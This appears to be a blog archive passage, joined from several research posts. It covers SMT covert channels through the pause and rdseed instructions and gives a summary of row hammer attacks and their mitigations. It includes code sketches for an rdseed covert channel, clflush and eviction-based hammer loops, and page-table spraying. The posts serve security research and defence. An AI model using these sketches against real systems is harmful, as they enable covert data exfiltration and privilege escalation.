It would be interesting to run covert shotgun (preferably made a bit smarter) on much larger lists of instructions to get a better overview of the situation. Another interesting project would be identifying the subsystems being congested by specific instructions. A good starting point would be Agner Fog's instruction tables [6] and the associated software, which leverages performance counters to identify port usage and lots of other juicy instruction information.

Further, it would be interesting to investigate to what extent these covert channels extend to spying. In particular, I found the covariance in instruction timing between different instructions really interesting – there certainly are patterns in there. They suggest congestion on multiple subsystems, and perhaps – just perhaps – there is enough data in that to fingerprint code across SMT. That would be especially interesting in SGX scenarios, or could lead directly to spying on branched victim code.

A word on microarchitecture timers

Most side channel attacks are timing attacks and thus subject to mitigation through modified timers, either by intention or in cases where a hypervisor has for other reasons decided to get a VMExit on rdtsc instructions. For this reason, I've been searching for a fast timer that isn't rdtsc, and so far I have not found one. A natural candidate would be a fast loop synchronized through either overt or covert access. Overt access through memory was in my experiments too slow to be useful. Probably the reason is that a store operation is required, which triggers a cache coherency action. So I wanted to see if the RdSeed channel could be used. Unfortunately, the answer is a clear no, with RdSeed taking upwards of 200 CLKs while microarchitectural attacks often require accuracy below 70 CLKs. That said – I have this other idea which I hope I'll get around to soon.
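For illustration, here is a minimal sketch of the memory-synchronized counter-loop candidate described above – one thread increments a shared variable as fast as it can, and other threads read it as a timestamp. As noted, the required store triggers cache coherency traffic, which is what made this approach too slow in my experiments. All names are mine:

/* Counter-thread timer sketch: a crude rdtsc substitute. */
#define _GNU_SOURCE
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>

static volatile uint64_t timestamp = 0;   /* the "clock" */

static void *ticker(void *arg) {
    (void)arg;
    for (;;)
        timestamp++;                      /* one tick per iteration */
    return NULL;
}

int main(void) {
    pthread_t t;
    pthread_create(&t, NULL, ticker, NULL);

    uint64_t t0 = timestamp;
    /* ... operation to be timed goes here ... */
    uint64_t t1 = timestamp;
    printf("elapsed: %llu ticks\n", (unsigned long long)(t1 - t0));
    return 0;
}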

Conclusion

Despite my limited time with covert shotgun, it has shown great potential. I also think this simple experiment efficiently shows the dangers of SMT, if that wasn't clear to everybody already. In my opinion it's justified to talk about SMT as the core cause of all these covert channels (and other SMT channels as well), and consequently it's not very useful to talk about "a pause side channel" as a separate side channel rather than as a manifestation of the SMT side channel. With the number of manifestations and the number of different subsystems available, the only reasonable mitigation left against these covert channels seems to be turning off SMT entirely in threat models that include attackers having an implant in your VM. Personally I think the root cause is that the attacker is in your VM in the first place. If these methods can be used for spying, it is very likely that some can be implemented in JavaScript and thus be used for remote attacks.


[1] Dmitry Evtyushkin & Dmitry Ponomarev, "Covert Channels through Random Number Generator: Mechanisms, Capacity Estimation and Mitigations". http://www.cs.binghamton.edu/~dima/ccs16.pdf

[2] O. Acıiçmez and J.-P. Seifert, "Cheap Hardware Parallelism Implies Cheap Security". Fault Diagnosis and Tolerance in Cryptography (FDTC'07), pages 80-91, IEEE Computer Society, 2007.

[3] Sophia M. D'Antoine, "Exploiting Processor Side Channels to Enable Cross VM Malicious Execution". http://www.sophia.re/SC/thesis.pdf

[4] Anders Fogh, "Cache side channel attacks". http://dreamsofastone.blogspot.de/2015/09/cache-side-channel-attacks.html


[5] Daniel Gruss, Clémentine Maurice & Klaus Wagner (2015): "Flush+Flush: A Stealthier Last-Level Cache Attack". http://arxiv.org/pdf/1511.04594v1.pdf

[6] Agner Fog, "4. Instruction tables". http://www.agner.org/optimize/instruction_tables.pdf


Two covert channels

Introduction

Too much WinWord. Too much TeX. Too many meetings. Too little CPU. It was time for a short pause from the grind and a dig into some tetravalent metalloid. My current project was too big a mouthful to get into before going to Black Hat, so I dug up a pet project to play around with. And then it happened – I needed some info from the Intel documentation, and before you know it I had what I believe is a new side channel in my head. Then a second one. Then a third. Two of these side channels looked like they would make good arguments for a point I've been meaning to make. The third is more complex, and it might be fairly useful. Consequently, I decided to write this small blog post on the first two side channels and make my point. Both of these side channels are technically interesting; however, only the second is likely to be of any practical importance. I have not spent much time or effort researching these channels, as they are just a side project of mine. Beware: I've not checked the literature for these two particular channels, so I might be repeating other people's research. I do not recall having read anything, though.

Not all side channels are equal

Not all side channels are created equal. Some are inherently more powerful than others. However, there is no good way to measure how good a side channel is – it often comes down to the subjective question of what an attacker needs the channel for.

The simplest use of a side channel is the so-called covert channel. Most microarchitectural side channels can be used to communicate between two trust domains when an attacker has access to both. An attacker can use covert channels for data exfiltration, most importantly to stay hidden or because regular channels are not open. An example of a covert channel would be an implant on a virtual machine in the cloud that communicates through, say, a cache side channel with another VM on the same physical computer. In this scenario the attacker doesn't leave any TCP/IP logs and can communicate with his C2 server despite the defender turning off the network adapter.

While most microarchitectural side channels can be used as covert channels, some side channels provide insight into normal system behavior and are thus powerful enough to be used for spying, even when the attacker does not have access to both the attacker's and the victim's trust domains.

In this blog post we'll be looking at two side channels that fall into the first category: mostly irrelevant for spying but useful as covert channels. Since these channels are probably limited in this way, I have refrained from researching them very deeply. The point of this blog isn't the two new side channels, but a different one. However, both side channels are interesting from a technical viewpoint. The second side channel might even be practical.


Time for a pause – side channel with the pause instruction

Being old, one forgets the names of instructions from time to time; I needed a pause instruction and was searching for "wait". Anyhow, I picked up the optimization guide because I knew the right name would be in there. And so it was, but then I read the description again and noticed that the pause instruction has a profound impact on hyperthreads, because it does not significantly block resources of the other hardware thread on the core. That has probably been utilized by somebody already. But more interestingly: if two hyperthreads both use the pause instruction simultaneously, power can be saved. One has to wonder if that makes a difference in the execution time of the pause instruction. And it does. But the story is longer. The latency of the pause instruction is heavily dependent on power management settings and the current activity of the computer, so the channel depends on those settings. Further, Intel has been tinkering with the pause latency, so you're likely to see different results on different computers. My results are from an i3-5005U; I did not test on other computers. My power settings were "Balanced". Notice we are talking about a laptop here, which might be important too. Below is a plot of latency measurements of the pause instruction, taken with a core-co-located thread doing a loop of pause instructions and, likewise, with a co-located thread doing a normal integer operation (xor eax,eax – I tested other instructions with similar results). The plot is for a loop of 40,000 measurements.

[Figure: pause instruction latency measurements]

Usually we'd expect a speedup when a co-located hardware thread pauses, because the thread effectively yields all resources to the other hardware thread in the core, and in the measurements there is a bit of overhead that could be sped up. However, we are seeing the exact opposite. I can only speculate about the reason, but it seems likely that with both co-located hardware threads in pause mode, the entire core goes into pause mode. That is, the C-state of the core is increased, and this comes at a small latency cost. Whatever the cause, we have a measurable side channel. There is not much to spy on with this channel: we could possibly spot the kernel doing a spinlock for some reason, but really juicy information does not seem to be a likely catch. Since the channel depends heavily on power settings and on computer activity, it might not be very useful in practice. Further, the core-co-location requirement obviously detracts from the value of the side channel. Also, it's a timing side channel using the rdtsc(p) instruction, which gives leverage for detection as well as mitigation through timing inaccuracy. In fact, this attack would be difficult to get to run under VirtualBox (Ubuntu host), as this virtual machine is set up to cause a VMExit on rdtsc, which makes the measurement of such small time differences difficult (though not impossible). Even worse for the value of this side channel, pause itself can be made to cause a VMExit and thus be used for direct detection/mitigation of any pause-based side channel attack. So while we have a side channel here, it's not likely to be a very practical one.
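For reference, the measurement core of the experiment above can be sketched as follows (thread pinning to core siblings as in the covert shotgun sketch earlier); run it once while the sibling spins pause and once while it spins xor eax,eax, and compare the distributions:

/* Average pause latency in cycles; compare across sibling workloads. */
#include <stdint.h>
#include <x86intrin.h>                 /* __rdtsc, _mm_pause */

double pause_latency(int n) {
    uint64_t start = __rdtsc();
    for (int i = 0; i < n; i++)
        _mm_pause();                   /* the instruction being timed */
    return (double)(__rdtsc() - start) / n;
}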

Sowing a seed too many – side channel with rdseed

“Under heavy load, with multiple cores executing RDSEED in parallel, it is possible for the demand of random numbers by software processes/threads to exceed the rate at which the random number generator hardware can supply them. This will lead to the RDSEED instruction returning no data transitorily.”


That sounds like a very obvious side channel indeed. The RDSEED instruction was added with the Broadwell microarchitecture and uses thermal entropy in the CPU to generate cryptographically strong random numbers. The problem with this instruction seems to be that a bit of time is needed between calls to RDSEED for enough entropy to build up. Thus Intel designed the instruction to return an "error" via the carry flag if insufficient time has passed since the last call of RDSEED. So the basic idea is that an attacker could create a covert channel using this instruction: to send a 1-bit, the sender implant loops an rdseed instruction, and meanwhile the receiver runs a loop with plenty of time between rdseed calls. The information is extracted at the receiver's end from a count of failed rdseed instructions. My simple test setup was an infinite sender loop which either called the rdseed instruction or not, depending on the bit I wanted to send. My receiver looped 1000 times around an rdseed instruction followed by a 10 ms Sleep() call. 0-bits caused zero failures in the receiver loop, and typically around 800 failures in the 1-bit scenario. I tested only on an i3-5005U Broadwell laptop, both with the sender and receiver threads pinned on the same core and on different cores. Results were near identical.
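Below is a minimal sketch of this channel, assuming a CPU with rdseed and a compiler providing the _rdseed64_step intrinsic (gcc needs -mrdseed). I use usleep where my test used Sleep(); the decision threshold is an illustrative assumption:

/* rdseed covert channel sketch: sender drains the entropy source. */
#include <immintrin.h>                 /* _rdseed64_step */
#include <unistd.h>                    /* usleep */

void send_bit(int bit) {               /* runs in the sender implant */
    unsigned long long v;
    for (;;) {
        if (bit)
            _rdseed64_step(&v);        /* exhaust the seed source: "1" */
        /* for a 0-bit, leave the seed source alone */
    }
}

int receive_bit(void) {
    unsigned long long v;
    int failures = 0;
    for (int i = 0; i < 1000; i++) {
        if (!_rdseed64_step(&v))       /* carry flag clear: no seed ready */
            failures++;
        usleep(10 * 1000);             /* ~10 ms between samples */
    }
    return failures > 100;             /* threshold is an assumption */
}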


This particular channel is interesting in many ways, despite its limited use. It is a really rare thing that side channels in the CPU are not timing attacks based around the rdtsc(p) instruction. In fact, I know of only one other attack: the instruction reordering attack of Sophia D'Antoine, which, if I understand it correctly, is limited to scenarios that are not really reflective of the real world. This attack, however, works cross-core without other limiting factors – though it's limited to microarchitectures that support the instruction, which is only the newest Intel CPUs. Further, it does not appear to cause any interrupt that would allow instrumentation, and does not appear to be wired to performance counters that would allow detection, thus making low-impact software mitigation difficult. Finally, the channel could theoretically be used to spy on benign usage of the rdseed instruction, but probably wouldn't gain much information.

The real point

The point of this blog isn't that I found two new side channels. The point here is an entirely different one. The point is that, as a byproduct, I found at least two side channels in the processor of which at least one does not seem fixable in software. It might be in microcode, but I don't think that's relevant either. The point I wish to make is that, with the number of side channels already known and me finding two while not even looking for them, it seems likely that a great many side channels are waiting to be discovered. Not to mention the likelihood that Intel will add new ones with time (recall that the second side channel arrived with the Broadwell microarchitecture). Even if we knew all the side channels, we'd be hard pressed to come up with software detection/mitigation, and it seems unlikely that Intel will fix these side channels, as they've not done so in the past. Consequently, we should probably accept that covert channels in cloud computing are a fact of life and consider them an unavoidable risk. This of course does not mean we shouldn't continue to find and document the channels, since our only defense against them is malware analysts being able to spot one in a malicious implant.


Row hammer the short summary


Introduction

This is the first updated version of my original "Row hammer the short summary" blog post. As I had predicted, the summer turned out to be interesting in terms of row hammer, and it certainly appears I was right about that. With so much going on, I found it worthwhile to update this blog post to be in line with the latest developments and to fix a few minor details.


Short version of how DRAM works

Current DRAM comes in modules called DIMMs. If you buy a modern memory module for your PC, you're buying a DIMM. If you look at the DIMM, most DIMMs will have chips on both sides. Each side of the DIMM is a rank. Each rank again consists of a number of banks. The banks are in the physical individual chips you can see. Inside a bank you'd find a two-dimensional matrix of memory cells. There are 32k rows in the matrix and 16k or 512k cells per row. Each cell stores one bit and consists of a transistor for control and a capacitor which stores charge to signify a 1 bit and no charge to signify a 0 bit (on some chips the encoding is reversed). Thus a row stores 8kb or 64kb of data depending on the exact kind of DRAM you have in front of you. When you read or write from/to DRAM, an entire row is first read into a so-called row buffer; this is because reading automatically discharges the capacitors, and because writes rarely rewrite the entire row. Reading a row into the row buffer is called activating the row. An active row is thus cached in the row buffer, and if a row is already active it is not reactivated on requests. Also, to prevent the capacitors losing their charge over time, they are refreshed regularly (typically every 64 ms) by activating the rows.


Row hammer introduction

This section is based on [1] Kim et al. where not otherwise noted.

When a row is activated, a small effect is caused on the neighboring rows due to so-called cross-talk effects. The effect can be caused by electromagnetic interference; by so-called conductive bridges, where there is minor electric conductivity in DRAM modules where there shouldn't be; and finally by so-called hot-carrier injection, where an electron reaches sufficient kinetic energy that it leaks from the system or even permanently damages parts of the circuitry. The net effect is a loss of charge in the DRAM cell which, if large enough, will cause a bit to flip.

Consequently, it's possible to cause bits to flip in DRAM by repeatedly and systematically reading or writing from/to two rows in DRAM (activating the rows). Bit flips can be introduced in rows up to 9 rows away from these two "aggressor rows"; those 9 rows are called victim rows. Most errors happen in the rows immediately next to an aggressor row. Picking the aggressor rows so they bracket a victim row is called double-sided row hammering and is far more efficient than normal row hammering. Using two adjacent rows to hammer surrounding rows is called amplified single-sided hammering and can be useful in exploitation scenarios. If the victim rows are refreshed before enough cross talk can be generated, no bit flips are incurred. As a rule of thumb, the higher the frequency of row activation, the higher the probability of flipping bits.

It has been shown that bits can be flipped in less than 9 milliseconds, typically requiring around 128k row activations. [3] Seaborn & Dullien have reported bit flips with as few as 98k row activations.

The problem occurs primarily with RAM produced after 2010. In a sample of 129 RAM modules from 3 manufacturers, over 80% were vulnerable, with all modules produced after 2012 being vulnerable. [4] Lanteigne showed that DDR4 RAM is vulnerable too, with 8 out of 12 sampled DRAMs subject to bit flips. Further, this paper showed that certain data patterns in the DRAM rows were more likely to cause bit flips.

[21] Lanteigne concludes that AMD and Intel CPUs are both capable of row hammering, but that the most bit flips are encountered when the methodology is adapted to the underlying memory controller in the attacked system.


Physical addressing and finding banks and rows

Obviously, to cause row hammering one needs two addresses belonging to rows in the same bank. [2] showed that repeatedly choosing two random addresses in a large buffer will, in a practical amount of time, produce a pair in the same bank and thus be useful for hammering from software. For example, with 32 banks, a random pair of addresses lands in the same bank with probability of roughly 1/32, so only a modest number of tries is needed.

An optimal solution requires that the attacker has knowledge of physical addresses. Even with a physical address, an attacker would need to know how physical addresses map to DIMMs, banks and rows to hammer optimally. [5] Seaborn used row hammer itself to derive the complex function that maps physical address to DRAM location for a Sandy Bridge computer. [6] Pessl et al. showed how to use "row buffer side channel attacks" to derive the complex addressing function generically, and provided maps for many modern Intel CPUs.

The /proc/$PID/pagemap interface can provide physical addresses. However, it is not available in all operating systems, and it no longer affords unprivileged access in most operating systems that do support it. For an attacker, this problem remains to be definitively solved.


Row hammering with software

To cause row hammer from software you need to activate memory rows, that is, cause reads or writes to go to physical memory. However, modern processors are equipped with caches precisely so that reads and writes do not incur serious speed penalties. Thus, to cause row hammering bit flips, the caches must be bypassed.

[1] did this using the clflush instruction, which removes a particular address from the cache, causing the next read of the address to go directly to memory. This approach has two downsides. First, since clflush is a rare instruction, validator sandboxes (such as NaCl of Google Chrome) can ban it and thus defeat the attack. Second, just-in-time compilers and existing code on computers generally do not use this opcode, disabling attack scenarios where JIT compilers are used (such as JavaScript) or, in the future, where existing code is reused in data-only attacks.
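A minimal sketch of such a clflush-based hammer loop, assuming two addresses mapping to different rows in the same bank have already been found (see the section on physical addressing above); bit flips would then be searched for in the victim rows:

/* clflush-based double-sided hammering loop, in the style of [1]. */
#include <emmintrin.h>                 /* _mm_clflush */
#include <stdint.h>

void hammer(volatile uint8_t *aggressor1, volatile uint8_t *aggressor2,
            long rounds) {
    for (long i = 0; i < rounds; i++) {
        *aggressor1;                   /* activate row 1 */
        *aggressor2;                   /* activate row 2 */
        _mm_clflush((const void *)aggressor1);  /* force next reads */
        _mm_clflush((const void *)aggressor2);  /* to go to DRAM    */
    }
}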

[7] Aweke posted on a forum that he was able to flip bits without clflush – he did not say how, but it was likely using the same method as [8], which systematically accessed memory in a pattern that causes the processor to evict the address of the aggressor row from the cache, causing the next read to go to physical memory. Unfortunately, how to evict caches is CPU dependent and undocumented, and despite [8] Gruss, Maurice & Mangard mapping out how to evict optimally on most modern CPUs, it's not the most trivial process. Typically, this requires knowledge of the physical address, as discussed above, as well as a complex mapping function for cache sets. It is, however, possible to approximate this either by using large pages or through timing side channels. It is also slower, and thus less efficient, than the clflush version above. Since this vector does not require special instructions, it's applicable to native code (including sandboxed code), JavaScript and potentially other JIT-compiled languages.
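The eviction-based variant can be sketched as below; constructing the eviction set (addresses cache-set congruent with the aggressor) and the exact access pattern needed to defeat the replacement policy are the CPU-dependent, non-trivial parts [8] and are omitted here:

/* Eviction-based hammering sketch: no clflush, no special opcodes. */
#include <stdint.h>

void hammer_evict(volatile uint8_t *aggressor,
                  volatile uint8_t **evset, int evlen, long rounds) {
    for (long i = 0; i < rounds; i++) {
        *aggressor;                    /* activate the aggressor row */
        for (int j = 0; j < evlen; j++)
            *evset[j];                 /* walk cache-set congruent
                                          addresses to evict it */
    }
}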

[9] Qiao & Seaborn found that the movnti instruction is capable of bypassing the caches on its own. Further, this instruction is commonly used – including in memcpy/memset implementations in common libraries – and is thus difficult to ban in validator sandboxes; it also lowers the burden for future row hammer as a code-reuse attack. It remains to be seen whether JIT-compiled languages can make use of it.

Finally, [10] Fogh showed that the policies that maintain the coherency of the multiple caches on the CPU can be used to cause row activations, and speculated it would be fast enough for row hammering. Since the coherency policies are subject to much less change than cache eviction policies and do not require any special instructions, this method may solve the problems of the other methods, should it be fast enough. This remains to be researched.


Exploiting row hammer

[2] showed that row hammer could be used to break out of the NaCl Chrome sandbox. The NaCl sandbox protects itself by verifying all code paths before execution and blocking undesired activities. To avoid new unintended code paths being executed, the sandbox enforces 32-byte-aligned targets for indirect jumps by masking the register and adding a base address. In code it looks like this:

and rax, ~31

add rax, r15  //(base address of sandbox)

jmp rax

Bit flips in these instructions often cause other registers to be used, bypassing the sandbox's limits on indirect jumps. By spraying code like the above, row hammering, checking for usable bit flips, and finally using one of the corrupted jumps, an attacker can execute a non-validated code path and thus exit the sandbox. Non-validated code paths can be entered through code-reuse style gadgets.

The second and more serious privilege escalation attack demonstrated by [2] went from ring 3 user privileges to ring 0. Since adjacent physical addresses have a tendency to be used at the same time, CPU vendors map adjacent physical addresses to different parts of RAM, as this offers the possibility of memory requests being handled by DRAM in parallel. This has the effect that banks are often shared between different software across trust boundaries, which allows an attacker to flip bits in page table entries (PTEs). PTEs are central to security on x86; they control access rights to memory as well as the mapping between virtual and physical addresses. By repeatedly memory-mapping a file, many new PTEs are sprayed, and the attack has a good chance of hitting one at random with row hammer. The attacker hopes that a bit flips so that a PTE with write privileges points to a new physical address where another PTE is located. By strategically modifying this second PTE, the attacker gains read and write access to the entire memory.
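For illustration, the spraying step can be sketched as below, under the assumption of a small scratch file; the hammering, the scan for a mapping that now points into a page-table page, and the final PTE rewrite are omitted (see [2] for the full attack):

/* PTE spraying sketch: map one file many times so that physical
 * memory fills up with page-table pages. */
#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>

int main(void) {
    int fd = open("/tmp/spray", O_RDWR);      /* hypothetical 2 MB file */
    if (fd < 0) { perror("open"); return 1; }
    for (int i = 0; i < 100000; i++) {
        void *p = mmap(NULL, 2 << 20, PROT_READ | PROT_WRITE,
                       MAP_SHARED, fd, 0);
        if (p == MAP_FAILED) { perror("mmap"); break; }
        *(volatile char *)p = 1;              /* touch to populate PTEs */
    }
    /* ... hammer, then hunt for a corrupted PTE ... */
    return 0;
}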

[18] Bhattacharya & Mukhopadhyay used row hammer to extract a private 1024-bit RSA key. Their attack used a combination of PAGEMAP, a cache side channel attack (prime+probe) and a row buffer side channel attack to find the approximate location of the private key in physical memory. Once it was located, row hammer was used to introduce a fault in the private key, and fault analysis was then used to derive the real private key. This makes the attack somewhat unique, in that it's the only attack so far that does not rely on any kind of spraying.

[19] Bosman et al. break the Microsoft Edge JavaScript sandbox. First they use two novel deduplication attacks to gain knowledge about the address space layout. This allows them to create a valid-looking, but counterfeit, JavaScript object in a double array. They then find bit flips by allocating a large array and using single-sided row hammering. The method used is similar to [8], but they also notice and exploit the fact that pages 128k apart are likely to be cache-set congruent. Once they know where the bit flips are, they can place a valid object at that address, crafted so that the bit flip will change it into a reference to the counterfeit object. Once this is set, the row hammering is repeated, and they then have a reference to the counterfeit object that can be used by compiled JavaScript. Further, the object can be edited through the double array in which it was created, and this allows arbitrary memory read and write.

[20] Xiao et al.: the content of this paper is unknown to me, yet the title suggests that cross-VM attacks and a new kind of privilege escalation are possible with row hammer.

It is likely that row hammer can be exploited in other ways too.


Row hammer mitigation

Most suggested hardware mitigations focus on refreshing victim rows, leaving less time for row hammer to do its work. Unfortunately, during a refresh the RAM is unable to respond to requests from the CPU, so this comes at a performance penalty.

The simplest suggestion is to increase the refresh rate for all RAM. Much hardware supports this already for high temperatures. Usually the refresh rate is doubled; however, to perfectly rule out row hammer one would need to increase the refresh rate more than 7-fold [1], which in turn is a steep performance penalty and a power consumption issue.

TRR [17] is a method that keeps track of used rows and causes targeted refreshes of their neighbors to minimize the penalty. The method needs to be supported by both the CPU and the RAM modules. MAC, also known as maximum activation count, keeps track of how many times a given row has been activated; pTRR does this only statistically and is thus cheaper to build into hardware. PARA [1] is another suggested hardware mitigation that statistically refreshes victim rows. ARMOR [16] is a solution that keeps track of row activations in the memory interface.

It has been suggested that ECC RAM can be used as a mitigation. Unfortunately, ECC RAM will not detect or correct bit flips in all instances where there are multiple bit flips in a row. This leaves room for an attack to be successful even with ECC RAM. Also, ECC RAM may cause the attacked system to reset, turning row hammer into a denial-of-service attack. [4] suggests this problem persists in real-life experiments. Keeping track of ECC errors may, however, serve as an indication that a system was under attack and could be used to trigger other countermeasures.

Nishat Herath and I suggested using the LLC miss performance counter to detect row hammering [11]. LLC misses are rare in real usage but abundant in row hammering scenarios. [12] Gruss et al. and [13] Payer refined the method by correcting for general activity in the memory subsystem. The methods are likely to present false positives in some cases, and [11] and [13] therefore suggested only slowing down offenders to prevent bit flips. [14] Aweke et al. presented a method that first detects row hammering as above, then verifies using PEBS performance monitoring, which has the advantage of delivering an address related to a cache miss and thus grants the ability to selectively read neighbor rows – in effect doing targeted row refresh in software. [15] Fogh speculated that this method could be effectively bypassed by an attacker.
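A minimal sketch of the counting side of this detection idea, using Linux's perf_event_open to read a hardware cache-miss counter; the one-second interval and the threshold are illustrative assumptions, not the tuned values from [11]:

/* LLC-miss-based row hammer detector sketch (Linux, needs privileges). */
#define _GNU_SOURCE
#include <linux/perf_event.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

int main(void) {
    struct perf_event_attr attr;
    memset(&attr, 0, sizeof(attr));
    attr.type = PERF_TYPE_HARDWARE;
    attr.size = sizeof(attr);
    attr.config = PERF_COUNT_HW_CACHE_MISSES;  /* last-level cache misses */

    /* count all processes on CPU 0 */
    int fd = syscall(SYS_perf_event_open, &attr, -1, 0, -1, 0);
    if (fd < 0) { perror("perf_event_open"); return 1; }

    for (;;) {
        uint64_t before, after;
        read(fd, &before, sizeof(before));
        sleep(1);
        read(fd, &after, sizeof(after));
        if (after - before > 10000000ULL)      /* threshold: assumption */
            printf("suspicious LLC miss rate: %llu/s\n",
                   (unsigned long long)(after - before));
    }
}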

Literature

[1] Yoongu Kim, R. Daly, J. Kim, C. Fallin, Ji Hye Lee, Donghyuk Lee, C. Wilkerson, K. Lai, and O. Mutlu. Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors. In Computer Architecture (ISCA), 2014 ACM/IEEE 41st International Symposium on, pages 361–372, June 2014.

[2] Mark Seaborn and Thomas Dullien. Exploiting the DRAM rowhammer bug to gain kernel privileges. March 2015.

[3] Mark Seaborn and Thomas Dullien. “Exploiting the DRAM rowhammer bug to gain kernel privileges”. https://www.blackhat.com/docs/us-15/materials/us-15-Seaborn-Exploiting-The-DRAM-Rowhammer-Bug-To-Gain-Kernel-Privileges.pdf

[4] Mark Lanteigne. "How Rowhammer Could Be Used to Exploit Weaknesses in Computer Hardware". Third I/O. http://www.thirdio.com/rowhammer.pdf

[5] Mark Seaborn. "How physical addresses map to rows and banks in DRAM".

[6] Peter Pessl, Daniel Gruss, Clémentine Maurice, Michael Schwarz, Stefan Mangard: "Reverse Engineering Intel DRAM Addressing and Exploitation"

[7] Zelalem Birhanu Aweke, "Rowhammer without CLFLUSH", https://groups.google.com/forum/#!topic/rowhammer-discuss/ojgTgLr4qM, May 2015, retrieved on July 16, 2015.

[8] Daniel Gruss, Clémentine Maurice, Stefan Mangard: “Rowhammer.js: A Remote Software-Induced Fault Attack in JavaScript”

[9] Rui Qiao, Mark Seaborn: "A New Approach for Rowhammer Attacks". http://seclab.cs.sunysb.edu/seclab/pubs/host16.pdf

[10] Anders Fogh: "Row hammer, java script and MESI". http://dreamsofastone.blogspot.de/2016/02/row-hammer-java-script-and-mesi.html

[11] Anders Fogh, Nishat Herath. "These Are Not Your Grand Daddy's CPU Performance Counters". Black Hat 2015. http://dreamsofastone.blogspot.de/2015/08/speaking-at-black-hat.html

[12] Daniel Gruss, Clémentine Maurice, Klaus Wagner, Stefan Mangard: “Flush+Flush: A Fast and Stealthy Cache Attack”

[13] Mathias Payer: “HexPADS: a platform to detect “stealth” attacks“. https://nebelwelt.net/publications/files/16ESSoS.pdf

[14] Zelalem Birhanu Aweke, Salessawi Ferede Yitbarek, Rui Qiao, Reetuparna Das, Matthew Hicks, Yossi Oren, Todd Austin: "ANVIL: Software-Based Protection Against Next-Generation Rowhammer Attacks"

[15] Anders Fogh: “Anvil & Next generation row hammer attacks”. http://dreamsofastone.blogspot.de/2016/03/anvil-next-generation-row-hammer-attacks.html

[16] http://apt.cs.manchester.ac.uk/projects/ARMOR/RowHammer/armor.html

[17]  http://www.jedec.org/standards-documents/results/jesd209-4

[18] Sarani Bhattacharya, Debdeep Mukhopadhyay: “Curious case of Rowhammer: Flipping Secret Exponent Bits using Timing Analysis”. http://eprint.iacr.org/2016/618.pdf

[19] Erik Bosman, Kaveh Razavi, Herbert Bos, Cristiano Giuffrida “Dedup Est Machina: Memory Deduplication as an Advanced Exploitation Vector”

[20] Yuan Xiao, Xiaokuan Zhang, Yinqian Zhang, and Mircea-Radu Teodorescu:”One Bit Flips, One Cloud Flops: Cross-VM Row Hammer Attacks and Privilege Escalation”.  To be published

[21] Mark Lanteigne: "A Tale of Two Hammers: A Brief Rowhammer Analysis of AMD vs. Intel". http://www.thirdio.com/rowhammera1.pdf